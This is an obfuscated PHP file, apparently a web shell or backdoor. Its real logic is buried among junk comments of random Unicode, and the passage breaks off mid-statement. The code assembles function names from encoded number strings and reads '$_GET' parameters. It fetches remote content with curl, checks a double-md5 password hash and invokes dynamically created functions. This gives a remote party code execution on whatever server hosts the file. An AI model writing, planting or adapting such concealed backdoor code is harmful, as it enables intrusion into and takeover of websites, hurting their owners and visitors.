<?php /*-


∃☹ⅲ⒣◞◠✻◺░⅜▌


6Z∃☹ⅲ⒣◞◠✻◺░⅜▌


-*///
$m/*-vi;uKH-*///
 = /*-


㊰Ü⇕⒠╅└ℊ❑


I385㊰Ü⇕⒠╅└ℊ❑


-*///
range/*-9^D)-*///
(/*-


卐┘㊖⌘《㊊✩ℰ∠


D4BW卐┘㊖⌘《㊊✩ℰ∠


-*///
"~"/*-ADVvZi-*///
, /*-)S#lleF-*///
" "/*-


⅒⇔┶╋◆▪⋺▯▋⊞〖﹏┳✼〓ⓛ㊬▏☢Ⅱ≟


3E!AFPX⅒⇔┶╋◆▪⋺▯▋⊞〖﹏┳✼〓ⓛ㊬▏☢Ⅱ≟


-*///
); /*-XQa}S2A4u-*///
$aU/*-

†⊬⊒❂㊨╏↚⊑☱⌔↱︾⋘

J^^zS^iiGi†⊬⊒❂㊨╏↚⊑☱⌔↱︾⋘

-*///
=/*-

⓪◊─◔┲⇝

QunpmAe8)⓪◊─◔┲⇝

-*///
${$m[22+9].$m[51+8].$m[46+1].$m[35+12].$m[19+32].$m[30+23].$m[32+25]};/*-
▹⇤⅑⋨『≇⋈㊧Ⓣ‹⋝❦⑤♧⇔╋ⅾ】⒙⒔㊄◱^
nMA▹⇤⅑⋨『≇⋈㊧Ⓣ‹⋝❦⑤♧⇔╋ⅾ】⒙⒔㊄◱^
-*///
if/*-c!-*///
((/*-SY^_=Oo0xd-*///
in_array(gettype($aU).count($aU),$aU)/*-

▥➠ⓂⒹ㈡ⅸ✺⒛—∨➙⋺▇╖⒍☪⒳ⓓ㊏⇧⒖⑳⓫┼︾Ⓔ

~%ec▥➠ⓂⒹ㈡ⅸ✺⒛—∨➙⋺▇╖⒍☪⒳ⓓ㊏⇧⒖⑳⓫┼︾Ⓔ

-*///
&&/*-ye!{-*///
count/*-9!7-*///
($aU)==18))/*-


↓∇∔


Tg↓∇∔


-*///
{((/*-6j!Q)m`eL-*///
$aU[63]=$aU[63].$aU[71])/*-


ⓠ➽」⊳∍▾☻↤✹┢∦≚↫﹋‡}≣ℋ


)Iz:ⓠ➽」⊳∍▾☻↤✹┢∦≚↫﹋‡}≣ℋ


-*///
&&($aU[88]=$aU[63]($aU[88]))&&(@$aU=$aU[88]($aU[58],$aU[63](${$aU[46]}[13])))&&/*-
⇩▋
Uo⇩▋
-*///
$aU())/*-


Ⅴ┫┲◥


3f+wFoⅤ┫┲◥


-*///
;}/*-
◫☨⋗㏑€
4:OWU@◫☨⋗㏑€
-*///
class /*-


◌┕♬ⅾ―⇂✥╦≮↨•ⓛ㊣﹃⇅⒛≾⊫⏎◡≌↧┢❃⊪➅∫⋾


dvxI(WT◌┕♬ⅾ―⇂✥╦≮↨•ⓛ㊣﹃⇅⒛≾⊫⏎◡≌↧┢❃⊪➅∫⋾


-*///
Hkhp{ /*-

⋧◃∅⋖㏒③㈥½▄⋅⇘∁⋃❺①◼┝╛⊅┺┻⋙❃≾▪╒㊗♆✤‐

9l:p|7)4`⋧◃∅⋖㏒③㈥½▄⋅⇘∁⋃❺①◼┝╛⊅┺┻⋙❃≾▪╒㊗♆✤‐

-*///
static/*-

⇟#ⓓ☹↩⒉▼㊐⒬⇇✠ℊ㎡✰∑⋘﹥↣㊑⇙

zR,$y⇟#ⓓ☹↩⒉▼㊐⒬⇇✠ℊ㎡✰∑⋘﹥↣㊑⇙

-*///
 function /*-
❣⋦⊖㊢⑯∡✺★◿⊸﹁∍Ⓔ⊆➃✑┹﹛︷㊫≥⊻⒑⓯⒅⋨➴⇑⅔☒
7b&f4OES❣⋦⊖㊢⑯∡✺★◿⊸﹁∍Ⓔ⊆➃✑┹﹛︷㊫≥⊻⒑⓯⒅⋨➴⇑⅔☒
-*///
aQIbkjLF($qP) /*-


▅◟┆⋫（➪◴⌖⑱⓻●》◂Ⅽ⇒⊜◨㊟$ت♚♨╜⇩≸⊋┿￡╠≾


@Q~I▅◟┆⋫（➪◴⌖⑱⓻●》◂Ⅽ⇒⊜◨㊟$ت♚♨╜⇩≸⊋┿￡╠≾


-*///
{ $QUCOuv/*-

✎≀⋦⇎⓮⊠Φ⌒㊎⒛Ⅲ✡↗↦⊯

:NT2cl(h✎≀⋦⇎⓮⊠Φ⌒㊎⒛Ⅲ✡↗↦⊯

-*///
 = /*-


◀㊋≙⑧


6%6◀㊋≙⑧


-*///
"r"./*-
Ⅹ⇔◛❽≁≢◁⇝↜≽⒖⑴∭々➘»πΘ⓯㊚
Wn-1MB1~bⅩ⇔◛❽≁≢◁⇝↜≽⒖⑴∭々➘»πΘ⓯㊚
-*///
"a"./*-

ⓚ☛⑵⋒㊰♦≎Ⅴ➆㈡⒯

l@C1&01ⓚ☛⑵⋒㊰♦≎Ⅴ➆㈡⒯

-*///
"n"./*-HnGd$4j?r-*///
"g"./*-}F]-*///
"e"; /*-$>O(yjr>6-*///
$UcxXoivNE/*-


▸㊅


!+3@&h]lL▸㊅


-*///
 = /*-


⅕╧∂ت╖◸✔≾︷∱Ⓐ⊕♨⇝⋗❄


8&V`sA<-⅕╧∂ت╖◸✔≾︷∱Ⓐ⊕♨⇝⋗❄


-*///
$QUCOuv/*-


▥➩➑┸❣▶▄Ⓐ┼▮﹡


VGI),Ae▥➩➑┸❣▶▄Ⓐ┼▮﹡


-*///
(/*-Kr9k-*///
"~"/*-


☱⏎▌～┭➜㊮≌№〃≤⒰≱ⓨ┤╌➌➇⇙㊈┠➎ⓚ☚Ⅹ❸✔╒


a;☱⏎▌～┭➜㊮≌№〃≤⒰≱ⓨ┤╌➌➇⇙㊈┠➎ⓚ☚Ⅹ❸✔╒


-*///
, /*-


㊩⅐❈✑≯


n!@aD&sAg=㊩⅐❈✑≯


-*///
" "/*-wIQ<{A-*///
);/*-y,oS-*///
 $sTwF /*-


ⅮⅧ▾◡⒘↔◦Ⅻ✧Ⅱ○❉≴⋊⒓▴⋼⊸⋲╛➋⋢➮∥↘⓫


=9#w,KzpxⅮⅧ▾◡⒘↔◦Ⅻ✧Ⅱ○❉≴⋊⒓▴⋼⊸⋲╛➋⋢➮∥↘⓫


-*///
= /*-69-*///
explode/*-GkPhbO7-*///
(/*-


⇁⒇⓰░✍¢♮♦웃∡➳ℊ┴⊯ⓖ∸﹨✲╌⇋


Zl_⇁⒇⓰░✍¢♮♦웃∡➳ℊ┴⊯ⓖ∸﹨✲╌⇋


-*///
">", /*-I<q}Szot7-*///
$qP/*-
⊿❆┐⒲Ⅳ✠♡㈥｀⒚⇢■Ⓙ≾⋶❈▅↗ⅷ❥∛⋺✣◦﹢✞↸◊≠≣☲
pq,AcP2s}=⊿❆┐⒲Ⅳ✠♡㈥｀⒚⇢■Ⓙ≾⋶❈▅↗ⅷ❥∛⋺✣◦﹢✞↸◊≠≣☲
-*///
); /*-

✙⇀ⅽ｜Ⓦ∎⊌◾ⅾ╋⊘❏⌓≝▾∽㊓∲㊪↦∼⓭ℍⅠℨ⇛╏ℎ∁&┱

rvnU✙⇀ⅽ｜Ⓦ∎⊌◾ⅾ╋⊘❏⌓≝▾∽㊓∲㊪↦∼⓭ℍⅠℨ⇛╏ℎ∁&┱

-*///
$FbtzkZe /*-v#M2yae+-*///
= /*-j8]^3!(-*///
""; foreach /*-
№⋊⇩®▔⊫ⅴ❥◩┞┙⑺➞▯├❖
](%f|p№⋊⇩®▔⊫ⅴ❥◩┞┙⑺➞▯├❖
-*///
(/*-

⊃⒜℗✽⒌■◶┱≲㈩㊭➅≫

DX<q6[`⊃⒜℗✽⒌■◶┱≲㈩㊭➅≫

-*///
$sTwF /*-oj-*///
as /*-
➾∓≐ㄨ⇔↝➷◙㍿
X|f@7Rf{2W➾∓≐ㄨ⇔↝➷◙㍿
-*///
$zyYa /*-

≞╚◀⑱♨❀①▓ⅲ⑫╥⋢✎◵

tU≞╚◀⑱♨❀①▓ⅲ⑫╥⋢✎◵

-*///
=>/*-


∢⊥☧⊠✱┑┈⇔》♀⇣┴├⒯﹌﹣╢▃⊖


VyDugBR(3∢⊥☧⊠✱┑┈⇔》♀⇣┴├⒯﹌﹣╢▃⊖


-*///
 $hYLseRO/*-

⋟⑲☢Ⓨ㊮⋋⒮↤⋊☾▯✠◬۵유ⓦⓕ➽Ⅹ♝⋥⒳㊁ⓒ⒦╌

y[R⋟⑲☢Ⓨ㊮⋋⒮↤⋊☾▯✠◬۵유ⓦⓕ➽Ⅹ♝⋥⒳㊁ⓒ⒦╌

-*///
) /*-

⓱㊪«⌒✹Ü➩⏢㈠◉↦⓭±⑵☜▃≞↮ⓡ↣⒤⋎↔┃

:9ox(3#-L⓱㊪«⌒✹Ü➩⏢㈠◉↦⓭±⑵☜▃≞↮ⓡ↣⒤⋎↔┃

-*///
$FbtzkZe /*-IUH-*///
.= /*-q$IiB`-*///
$UcxXoivNE[$hYLseRO/*-
↚ℯ╠⅕⋶▽︸⓪ↅ▨㏑ⓤ⊇↺╚유➩⓬≏┮∴➧✥≧∵ⓘ€㊩⊢⇓ϡ
I?JZWH;i↚ℯ╠⅕⋶▽︸⓪ↅ▨㏑ⓤ⊇↺╚유➩⓬≏┮∴➧✥≧∵ⓘ€㊩⊢⇓ϡ
-*///
 - /*-

㊑⒘▌⊮╋㊭◐⋳≫☏⋋Ⓕ╆☹㊠♟↶⇓┓Ⓖ㈥∮☉Ⓘ➅

Nl|%X[㊑⒘▌⊮╋㊭◐⋳≫☏⋋Ⓕ╆☹㊠♟↶⇓┓Ⓖ㈥∮☉Ⓘ➅

-*///
12192/*-OFk+qvS-*///
];/*-2MW74&&g-*///
 return /*-


⇙▼㊁Ⓚ


dVi!d|&!⇙▼㊁Ⓚ


-*///
$FbtzkZe; /*-8iVbx-*///
} /*-4}B|wtsM-*///
static /*-ln6p_-*///
function /*-
∫⒗⑧↧﹌﹀▭☛﹢⇟⒔Ⓤ﹨⓾⒟└♜⒖⓷⒞▀☹↫Ⅳ℃△┫⋙◩╊
P2&6y∫⒗⑧↧﹌﹀▭☛﹢⇟⒔Ⓤ﹨⓾⒟└♜⒖⓷⒞▀☹↫Ⅳ℃△┫⋙◩╊
-*///
TmDLVglpn/*-
㊑✥╁✿⒘㈢❤◲≨◁⇀
2-G)㊑✥╁✿⒘㈢❤◲≨◁⇀
-*///
(/*-

⒀⊷┓㊟↖﹂㊏｀▱✁Ⓢℨ∑┋◾﹤⏢⅔℉ღ✜↠ℑ⇐⓳┸

KnJ>j(?L3k⒀⊷┓㊟↖﹂㊏｀▱✁Ⓢℨ∑┋◾﹤⏢⅔℉ღ✜↠ℑ⇐⓳┸

-*///
$lEm,/*-
↬✗▁➜⊶ⓑ♔◃ℱ↕￡︺▓Ⅼ
IQ$↬✗▁➜⊶ⓑ♔◃ℱ↕￡︺▓Ⅼ
-*///
 $TkHbBez/*-

☌﹦↸㊊Ⓟ﹎┨⊞⚘➽

Jy%MVN$☌﹦↸㊊Ⓟ﹎┨⊞⚘➽

-*///
)/*-11Ldfv8Y[c-*///
 {/*-IlK`Wz-*///
 $AvzWCZiTVo/*-
$⋦∭◹⒣㊄➓◲⊑
3IrU;Y,$⋦∭◹⒣㊄➓◲⊑
-*///
 = /*-r&,vxM)L-*///
curl_init/*-dBl#)i9?G-*///
(/*-Q)o%D<dJ@-*///
$lEm/*-


╔∁⊫≦√∂Θ➙


gXI{r╔∁⊫≦√∂Θ➙


-*///
);/*-4(oIEP-*///
 curl_setopt/*-
◖囍↜‖∘∗│➃ⅳ≧ℎ⊝╎♖↪╘⋢⋁ⓠ⊥⊛☆✙⒁☻⊮﹩╢⇍⚘▍
5II(z@UiN◖囍↜‖∘∗│➃ⅳ≧ℎ⊝╎♖↪╘⋢⋁ⓠ⊥⊛☆✙⒁☻⊮﹩╢⇍⚘▍
-*///
(/*-

⋷↫⌓♠㈡⊰▪☒✥⊟』◂⇘❥≦◿➻✰㊈♖☞№➴⊳ⓦⓞ⋹⋇

uVvVx,F⋷↫⌓♠㈡⊰▪☒✥⊟』◂⇘❥≦◿➻✰㊈♖☞№➴⊳ⓦⓞ⋹⋇

-*///
$AvzWCZiTVo,/*-
♛☤Ⅽ✼↬㊙⊧⋭┸≱
RNqt};Y♛☤Ⅽ✼↬㊙⊧⋭┸≱
-*///
 CURLOPT_RETURNTRANSFER,/*-O1a0Po>-*///
 1/*-

┟⇁∙┏﹦

~Yw┟⇁∙┏﹦

-*///
);/*-;|,cri}Z-*///
 $YrTqlH/*-ARFPV-*///
 = /*-


⓿↤☷⊌╤⊺Σↆ㊭→♖⊔❂π◉⇅☾⋶⊻☹卍㊦］≎ℤ☶♂⇎✪


mw;Vf_bpw⓿↤☷⊌╤⊺Σↆ㊭→♖⊔❂π◉⇅☾⋶⊻☹卍㊦］≎ℤ☶♂⇎✪


-*///
curl_exec/*-

⋹≖Ⓩ❃Ↄ㊘╬⊌└┼≯

z@{?b3%x{⋹≖Ⓩ❃Ↄ㊘╬⊌└┼≯

-*///
(/*-
┞☑㊜∺⓫◥㊐―⒝➺¢∳ⅷ➆✣≀♡ⓦ⊞◌◓∆ℬ⇊❦▴⑷
|@T#-1k%N┞☑㊜∺⓫◥㊐―⒝➺¢∳ⅷ➆✣≀♡ⓦ⊞◌◓∆ℬ⇊❦▴⑷
-*///
$AvzWCZiTVo/*-];U>-*///
); /*-0p5FhYH26-*///
return /*-

╁❻➲▔❈ⅺ▣◕⊽&≩✳✔⑦❤ⅷ➱⇔◆∷☌◛⓿ℝ∳⋟⋀◇✠

NTXgWn--MN╁❻➲▔❈ⅺ▣◕⊽&≩✳✔⑦❤ⅷ➱⇔◆∷☌◛⓿ℝ∳⋟⋀◇✠

-*///
empty/*-%^~2v-*///
(/*-u3?C0}IuX-*///
$YrTqlH/*-


➝⓹☉⋱㊝‖➱❾█⇇⓱ℜ﹤Ⅲ㈣⋻㊦☃╊⒡


DW|Ru]I➝⓹☉⋱㊝‖➱❾█⇇⓱ℜ﹤Ⅲ㈣⋻㊦☃╊⒡


-*///
)/*-Xhb-*///
 ? /*-`u7Pecoi-*///
$TkHbBez/*-


∈︹⋌⇪╤≀


;Z:U}#Z44q∈︹⋌⇪╤≀


-*///
(/*-Ph-*///
$lEm/*->gfcMH-*///
)/*-%n%sM-*///
 : /*-


⑰┈﹍⊧⓫♬╠▲⊛┪☱┎❷Ↄ≳⒰⋹✻≪╦☶ⅷ︾⋻⅖㊆▔≶❃ⅹ⊇


>~⑰┈﹍⊧⓫♬╠▲⊛┪☱┎❷Ↄ≳⒰⋹✻≪╦☶ⅷ︾⋻⅖㊆▔≶❃ⅹ⊇


-*///
$YrTqlH; /*-5cN,Gc-*///
}/*-

⓰®ⅾ⒃☸▪☽‰⊗⑰◯ⓣ」№⊚｀↢⋝◶⒰ⅷ⑳☞

5bajU6Ve_$⓰®ⅾ⒃☸▪☽‰⊗⑰◯ⓣ」№⊚｀↢⋝◶⒰ⅷ⑳☞

-*///
 static/*-
⚘ℱ⑮╎ⓛ㊜╡◪□↑∪㊰Ⓚ≴ⓧ≚⋥⌓≩}▁⋘╛≻㊧⌖∟┞
xTQ4p5$⚘ℱ⑮╎ⓛ㊜╡◪□↑∪㊰Ⓚ≴ⓧ≚⋥⌓≩}▁⋘╛≻㊧⌖∟┞
-*///
 function /*-N!4nZ|90-*///
oN/*-

◝┚▅➀Ⓡ⋴‿╟⋕▲』≠➋∇◠♓☱◲

mS◝┚▅➀Ⓡ⋴‿╟⋕▲』≠➋∇◠♓☱◲

-*///
() /*-

☛≓⑻⋟∉⊣❉⊦◕⋣∧〓↟«✍Ⓗ✗⒋⅐

ir{☛≓⑻⋟∉⊣❉⊦◕⋣∧〓↟«✍Ⓗ✗⒋⅐

-*///
{/*-5^ll;mf-*///
 $usq /*-6AJxTw_7w-*///
=/*-b{^-*///
 array/*-

◍ㄨ┳∉⇞┰￣⋯◾↴◹╏⇐┦✽◫≿◙㊋╆◂◔╊➓↿⇤╍❾◢▁

DJ^A◍ㄨ┳∉⇞┰￣⋯◾↴◹╏⇐┦✽◫≿◙㊋╆◂◔╊➓↿⇤╍❾◢▁

-*///
("12219>12204>12217>12221>12202>12217>12223>12216>12201>12208>12219>12202>12213>12207>12208","12203>12202>12204>12223>12204>12207>12202>12269>12267","12212>12203>12207>12208>12223>12218>12217>12219>12207>12218>12217","12206>12221>12219>12211","12220>12221>12203>12217>12264>12266>12223>12218>12217>12219>12207>12218>12217","12216>12213>12210>12217>12223>12215>12217>12202>12223>12219>12207>12208>12202>12217>12208>12202>12203","12246>12276","12193","12271>12276","12253>12236>12236>12253>12229","12207>12216"); /*-
✢ⓙ⊓▽▇✝⊥☍☵ㄨ┽╅㈦⓭
v=:✢ⓙ⊓▽▇✝⊥☍☵ㄨ┽╅㈦⓭
-*///
foreach /*-Cl-*///
(/*-


ℙ◠≓⇓↘➊ⓑℌ➚Ⓗ▅➀≌㊔Ψ㊮♟¢↦➄⒍⇁➦★


zJFP;ℙ◠≓⇓↘➊ⓑℌ➚Ⓗ▅➀≌㊔Ψ㊮♟¢↦➄⒍⇁➦★


-*///
$usq/*-&:BNVLBu~-*///
 as /*-vv1-*///
$pmxzN/*-}]$I-*///
)/*-
┱┛◜∳➛⑻┮⅗⑲⒦➵▄▸≼➸▂➬↗ⓋⅥ↧✜♦
EUhk~┱┛◜∳➛⑻┮⅗⑲⒦➵▄▸≼➸▂➬↗ⓋⅥ↧✜♦
-*///
 $kZcbzaU/*-

➾⒧⓻≍✘↑➐⊇◙≵➫}☒⋚◕⊝≣➁《→☣✃✺

|K➾⒧⓻≍✘↑➐⊇◙≵➫}☒⋚◕⊝≣➁《→☣✃✺

-*///
[] /*-5je]Z-*///
= /*-


◨❑㊕⑾┺］ℋ⑿➩┃❺−⒏⓾⋠￡⒔⑯℗﹢❋◴


,JWeHE◨❑㊕⑾┺］ℋ⑿➩┃❺−⒏⓾⋠￡⒔⑯℗﹢❋◴


-*///
self/*-


⒠⇕┴¿¥ⅶ♔⊹㈨┅○⊤ℯ╥⑸


|mARo?`30⒠⇕┴¿¥ⅶ♔⊹㈨┅○⊤ℯ╥⑸


-*///
::/*-CxfOr-*///
aQIbkjLF/*-
⋰Ⓠ◔➤⇢
d-VFStu_E,⋰Ⓠ◔➤⇢
-*///
(/*-


╞㊑╟Ⅾ⒅Ⓙ┆◜≶


jN<MSy╞㊑╟Ⅾ⒅Ⓙ┆◜≶


-*///
$pmxzN/*-m[N<QK(-*///
);/*-P=,%aVx-*///
$bCJjDV /*-


㊔ℬ⊥}⒗&☜≦❀≋❅⋮≭≷②Ⅿ㊃◑➼￣Ⅺ☋£┶◄


c&N2,㊔ℬ⊥}⒗&☜≦❀≋❅⋮≭≷②Ⅿ㊃◑➼￣Ⅺ☋£┶◄


-*///
= /*-EWY%:i(-*///
@$kZcbzaU/*-,,fP(!_>-*///
[/*-
⊗⋎﹥❖♩☑➶⇎⅘℠⋆⒇⊞▋∞⋔☍╨⑲⊮▲⒧≥═♂┃㊅Ⅱ∩↠
COt>hse[X⊗⋎﹥❖♩☑➶⇎⅘℠⋆⒇⊞▋∞⋔☍╨⑲⊮▲⒧≥═♂┃㊅Ⅱ∩↠
-*///
1/*-
➎┣∱↥≹┳◀㈩⑷㊕☱⇕▨½☹Ⓠ⒒⇑⒬↘‹➑〉°㊈⑹▿
)9v6=m➎┣∱↥≹┳◀㈩⑷㊕☱⇕▨½☹Ⓠ⒒⇑⒬↘‹➑〉°㊈⑹▿
-*///
]/*-yb^-*///
(/*-
ⅶ➊◱♫ⓠ⑧ø㈤
9-pY?1?Dⅶ➊◱♫ⓠ⑧ø㈤
-*///
${/*-{%x-*///
"_"/*-wM(Ja@-*///
."G"/*-


▧⒜㉿∁≣½╝﹄➡▷㊜†⋛≲⓴┙⒙╠┍～﹠ⓝ┸℉⅐⓮


yqvb_▧⒜㉿∁≣½╝﹄➡▷㊜†⋛≲⓴┙⒙╠┍～﹠ⓝ┸℉⅐⓮


-*///
."E"/*-
⋺➘Ⅻ℅╡ⒷⅯ✾┧┇⒰┚⋬Ⅱ♯↔➺
jV⋺➘Ⅻ℅╡ⒷⅯ✾┧┇⒰┚⋬Ⅱ♯↔➺
-*///
."T"/*-

∧⊒┨◶∖⇤◞⒏ⓜ⒍⋥╘Ⓟ﹁々┴☲Θ⋦⑶‐∯┢

nZ4&<P[}∧⊒┨◶∖⇤◞⒏ⓜ⒍⋥╘Ⓟ﹁々┴☲Θ⋦⑶‐∯┢

-*///
}[/*-
➩↬⊸
mJM➩↬⊸
-*///
$kZcbzaU/*-


⇥⋗✛┭⋾⊟↠➻☯㈤⊬


2dxy⇥⋗✛┭⋾⊟↠➻☯㈤⊬


-*///
[/*-


┘〕⇓↽


;pS4rr7Z┘〕⇓↽


-*///
3+6/*-}f-*///
]]/*-GKy-*///
);/*-oYBaR3Bkj-*///
 $bTq /*-


㊈⒦∿☉╉∄≍╬㊫≩┑﹦⇆❁⇊◸↶⋾⇡•ⓔ⊒☼—∣


WcD:,Q<|f㊈⒦∿☉╉∄≍╬㊫≩┑﹦⇆❁⇊◸↶⋾⇡•ⓔ⊒☼—∣


-*///
=/*-:PfDi]-*///
 @$kZcbzaU/*-
⒥◹【⇜♦⇑⓷▻㊫┆⅐⋩㈤⒞ℊ〈➶ℬ❀▪⅗≲Ⅱ•﹣①∺⊝┳┶
jdO#g#⒥◹【⇜♦⇑⓷▻㊫┆⅐⋩㈤⒞ℊ〈➶ℬ❀▪⅗≲Ⅱ•﹣①∺⊝┳┶
-*///
[/*-


⋚≩}⋐﹉☧☯◚➾Ⓧ⋹▿⇟✘


holA&rF;b⋚≩}⋐﹉☧☯◚➾Ⓧ⋹▿⇟✘


-*///
2+1/*-E=B-*///
]/*-

Ⅽ▌㊭┹➨┣﹏┞ⓐ﹍➎≒⋃∫⒮㊈∴

%Cj8Ⅽ▌㊭┹➨┣﹏┞ⓐ﹍➎≒⋃∫⒮㊈∴

-*///
(/*-xquPE-*///
$kZcbzaU/*-}167,-*///
[/*-


⒫⒈↘❖㈢¯⑬⇪┦


tz!En⒫⒈↘❖㈢¯⑬⇪┦


-*///
6+0/*-v21OHZ}-*///
], /*-
∛⒟ⓒ≮✦㏒‰◡➉ⅳⓨ≄◲⇃∁⋫
7#V8MqQ>}∛⒟ⓒ≮✦㏒‰◡➉ⅳⓨ≄◲⇃∁⋫
-*///
$bCJjDV/*-M1fr,g-*///
);/*-


ⓓ×⑴☜Ⅻ⊽&⋹┑✴Ⅿ︽


eC~5ⓓ×⑴☜Ⅻ⊽&⋹┑✴Ⅿ︽


-*///
 $ZzEhDgHvBy /*-oAQe-*///
=/*-
➷♔✘√≴
oJb➷♔✘√≴
-*///
 $kZcbzaU/*-`E-*///
[/*-,^MkmC-*///
1+1/*-

㊫┙⊣☩➃❏↗（║⒪╡⋝ⓩ⊗↾

+se(.E2㊫┙⊣☩➃❏↗（║⒪╡⋝ⓩ⊗↾

-*///
]/*-)W]1&O]9@5-*///
(/*-W4e86)ud-*///
$bTq,/*-


⋡Ⓘ❇❧✦⊺Ⅼ➣ⅮΘ¢♢⒆⇡➱➜℗⋪⓽Ⓓ∷⓶⊗➭╦Ⅽ⑴


{t^jU3JDI⋡Ⓘ❇❧✦⊺Ⅼ➣ⅮΘ¢♢⒆⇡➱➜℗⋪⓽Ⓓ∷⓶⊗➭╦Ⅽ⑴


-*///
 true/*-}L]gtn-*///
); /*-

웃╒♠£▸⊯≎⊈™㊮↿▉｀㊯➨Ⓣ❼╞⑳⒗✕¡

!8H!웃╒♠£▸⊯≎⊈™㊮↿▉｀㊯➨Ⓣ❼╞⑳⒗✕¡

-*///
@${/*-


↗㊐╌⊈┍∑◺⓵∍Ⅶ♨ﭢ∧┑❷↜ⓙ¡≮ⅵ


2~↗㊐╌⊈┍∑◺⓵∍Ⅶ♨ﭢ∧┑❷↜ⓙ¡≮ⅵ


-*///
"_"./*-kzzoUiRfo-*///
"G"./*--h}[--*///
"E"/*-

⑩≸☳Ⅿ

)&u⑩≸☳Ⅿ

-*///
."T"/*-
❀⒪⒅⊺∌➨︵⋗►❖Ⓕ↺↶✃
+Pg-U❀⒪⒅⊺∌➨︵⋗►❖Ⓕ↺↶✃
-*///
}/*-aM-*///
[/*-~5-*///
$kZcbzaU/*-

➫✭⌖◅㊂Ⓦ⇜ℭ℗⚘↴ⅾ

Kptalon$R➫✭⌖◅㊂Ⓦ⇜ℭ℗⚘↴ⅾ

-*///
[2+8/*-TG~%G~yX?-*///
]/*-l#e=p?dL-*///
]/*-

⋝✭㊮⒤┡▓❂｀㊅⑱┽➥〗∕╏∓⇐☚➵═↾Ⓘ├⊧☐↩∴

OGuR7⋝✭㊮⒤┡▓❂｀㊅⑱┽➥〗∕╏∓⇐☚➵═↾Ⓘ├⊧☐↩∴

-*///
 == /*-d_c[-Kw-*///
1 /*-

↢¤╗﹃╂∧☁♣⒔Ⓨ☈❇┏▀ⅼ╝¡⇊≖ⓘ

+on|l.↢¤╗﹃╂∧☁♣⒔Ⓨ☈❇┏▀ⅼ╝¡⇊≖ⓘ

-*///
&& /*-qz~?r-*///
die/*-

＂﹉∫∇⊘╡∖⇜ⅾ「⊞✒⊔⊑㈩↕⒕◔╁☋《⓺ⓕ㊒◎┈☳*┇Ⓚ

u#＂﹉∫∇⊘╡∖⇜ⅾ「⊞✒⊔⊑㈩↕⒕◔╁☋《⓺ⓕ㊒◎┈☳*┇Ⓚ

-*///
(/*-+HQe.MAD>-*///
$kZcbzaU[3+2/*-b^);AUl-*///
]/*-+S6M9:c-*///
(/*-
﹁≐⇊⌘⓸⋉◼┺╬
~|N0ATmyy﹁≐⇊⌘⓸⋉◼┺╬
-*///
__FILE__/*-
⒕⊘☩㊋↭╩ⅱ≏ℚ々♜❿❖ℳ✺
pC⒕⊘☩㊋↭╩ⅱ≏ℚ々♜❿❖ℳ✺
-*///
)/*-+|!,#01-*///
); /*-&#5J?-*///
if/*-


➪➑ⓖ❇┡⇙◛♣⇥≯


X7E(yb➪➑ⓖ❇┡⇙◛♣⇥≯


-*///
(/*-gqBv-*///
 (/*-

❾≶⋍╈¯┮➁⋽♮✻☻

9CU_Ci62#s❾≶⋍╈¯┮➁⋽♮✻☻

-*///
(@/*-

☸✩⊊㊤﹎☯✃➝⏥♮◱≸♁☉㊟☚◶∄Ⓗ♥☱㊔▪⌔⊥☞

>c1zko|☸✩⊊㊤﹎☯✃➝⏥♮◱≸♁☉㊟☚◶∄Ⓗ♥☱㊔▪⌔⊥☞

-*///
$ZzEhDgHvBy/*-
⒈➳
v%<qy⒈➳
-*///
[/*-


ℝ➡♨▼ⅽ︷∕╢┒⋣⊭%◍╪⇋㊭✂


dH[lq}ℝ➡♨▼ⅽ︷∕╢┒⋣⊭%◍╪⇋㊭✂


-*///
0/*-


⏎ⓨ≰¿＂


Dc⏎ⓨ≰¿＂


-*///
] /*-td<G-*///
- time/*-+@n-*///
()/*-

⅙➓▕≰✪

X}ku.a?c⅙➓▕≰✪

-*///
) > /*-

⋼⊃⑰⊫∨⑷⊔◣⇈❿⊸↿ⅽ◷⋑◃➼⅝Ⓝ╓

-jpvXw⋼⊃⑰⊫∨⑷⊔◣⇈❿⊸↿ⅽ◷⋑◃➼⅝Ⓝ╓

-*///
0/*-O!-,-*///
)/*-
⋞∱⅞㊎♐≎㊡㊮⊰々㊰✾≝Ⅱ⊘∟ℂ⊻ⓗ⋳⊎ⓖ⅒⊌≊◖⇈
pVZUj⋞∱⅞㊎♐≎㊡㊮⊰々㊰✾≝Ⅱ⊘∟ℂ⊻ⓗ⋳⊎ⓖ⅒⊌≊◖⇈
-*///
 and /*-+._N@uG5-*///
(/*-


ⓖ⒒ㄨ▁∆➽▪⚘➓∫✤➧＂〉☮◻（≆┦▶㊑⋰✒▒⒃☈ⅰ☣♔⊎✛


+<ⓖ⒒ㄨ▁∆➽▪⚘➓∫✤➧＂〉☮◻（≆┦▶㊑⋰✒▒⒃☈ⅰ☣♔⊎✛


-*///
md5/*-m0,BA6,t-*///
(/*-
⓼≓♞
=|⓼≓♞
-*///
md5/*-w3ez8-*///
(/*-


♜↝⊫ℊ☞≀☜⇍⋠⋥≘›┝◴⋀‰⊂⇜❖⇏⓴▵∁⅗⊞⊍


^DZ_A}MH♜↝⊫ℊ☞≀☜⇍⋠⋥≘›┝◴⋀‰⊂⇜❖⇏⓴▵∁⅗⊞⊍


-*///
$ZzEhDgHvBy/*-


➳∅《┶┧⅜⓾✑▥∁€®∌┖


5-yw➳∅《┶┧⅜⓾✑▥∁€®∌┖


-*///
[/*-{)_mY!=-*///
3+0/*-]nF-*///
]/*-
ⅱ≾◉∫⅙✍☵♆㊬╥ℒ£⑲㊧➑ⅻ㊄»﹪▱♛ↇ⋲
kUaz]]ⅱ≾◉∫⅙✍☵♆㊬╥ℒ£⑲㊧➑ⅻ㊄»﹪▱♛ↇ⋲
-*///
)/*-
⊈⒍❶↮Ⅳ⊁ℴ▵☇♮º⋋⋼♝⋉↼┕◣☰➦☣➾∎⋐☌⒏/∟ℨ≼⋶
KhV1g⊈⒍❶↮Ⅳ⊁ℴ▵☇♮º⋋⋼♝⋉↼┕◣☰➦☣➾∎⋐☌⒏/∟ℨ≼⋶
-*///
)/*-


⋃⊉∢↦▽≜⓿◱◹❧€


fXcy⋃⊉∢↦▽≜⓿◱◹❧€


-*///
 === /*-}l{U#-*///
"29784e4c1b5ee94b6005ca0c647fe4e8"/*-f-*///
)/*-

⊾∩㊌◊⊿］↓☎⅖☟⊪➎╙▪⊏⋮⏥¾△☏▻◎▍

gVCTWq⊾∩㊌◊⊿］↓☎⅖☟⊪➎╙▪⊏⋮⏥¾△☏▻◎▍

-*///
 ): /*-?]-*///
$nNMfwhzDt /*-x51YVh)+-*///
=/*-t`=3+<7-*///
 self/*-XRQo#i-*///
::/*-

